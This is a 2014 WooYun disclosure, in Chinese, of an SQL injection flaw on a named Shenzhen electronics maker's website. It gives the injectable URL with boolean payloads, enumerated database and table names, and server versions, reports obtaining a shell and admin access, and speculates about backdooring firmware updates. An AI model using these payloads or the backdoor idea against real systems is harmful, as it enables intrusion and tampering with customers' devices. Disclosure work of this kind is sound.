当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082730

漏洞标题:深圳某公司主站存在SQL注入漏洞(可修改官方安全预警系统、行车记录仪及GPS等升级数据)

相关厂商:深圳善领科技有限公司

漏洞作者: wefgod

提交时间:2014-11-10 09:56

修复时间:2014-12-25 09:58

公开时间:2014-12-25 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

已shell

详细说明:

出问题的是深圳善领科技有限公司主站,为了避免点啥,所以标题稍微那个一下
善领的电子狗还是好评度很高的,最近买了一个,不小心发现了……官网的严重问题啊。官网应该用的是thinkphp
而且官方很多升级包都是直接在官网发布的(没骗你,全部产品升级数据都可以在后台改),被人留了一个后门进去怎么办?事实监控卖出去的每一台电子狗和行车记录仪的位置怎么办?
看来以后的监控手段可以进化了,你只需要送他一台电子狗~~

漏洞证明:

先注册。
http://www.zenlane.com/index.php/Member/downinfo/id/127'%20and%20'1'='1

image001.png


http://www.zenlane.com/index.php/Member/downinfo/id/127'%20and%20'1'='2

image003.png


image005.png


available databases [2]:
[*] information_schema
[*] www_zenlane_com
web application technology: Apache 2.4.2, PHP 5.3.15
back-end DBMS: MySQL 5.0.11
Database: www_zenlane_com
[182 tables]
+----------------------+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mytasks |
| cdb_mythreads |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
| h_about |
| h_access |
| h_activecode |
| h_activecode_backup |
| h_attach |
| h_audionavigation |
| h_backer |
| h_category |
| h_city |
| h_content |
| h_customer |
| h_dealers |
| h_dealers_old |
| h_download |
| h_downloaddata |
| h_dsa |
| h_ebook |
| h_email |
| h_feedback |
| h_freelog |
| h_freeuserdownload |
| h_gpsfile |
| h_gpstype |
| h_group |
| h_groupuser |
| h_information |
| h_jifen |
| h_jifen_log |
| h_job |
| h_license |
| h_licenseupload |
| h_links |
| h_member |
| h_news |
| h_news4 |
| h_node |
| h_notice |
| h_parament |
| h_policy |
| h_products |
| h_province |
| h_region |
| h_role |
| h_role_user |
| h_sales |
| h_service |
| h_servicewarn |
| h_sessions |
| h_setting |
| h_shop |
| h_shopcomment |
| h_shopimages |
| h_showshop |
| h_solution |
| h_supply |
| h_toppic |
| h_user |
| h_video |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+----------------------+

image007.png


路径加个admin,需要的自然会有

image009.png


image010.png


升级资料,可留后门吗?反正哥是做不来……

image012.png


还有经销商黑名单!

image014.png


似乎曾经有人来光顾过,但是不知道成功没有

image016.png


image017.png


最后不小心

image019.png


修复方案:

嗯,可能会很多问题

版权声明:转载请注明来源 wefgod@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝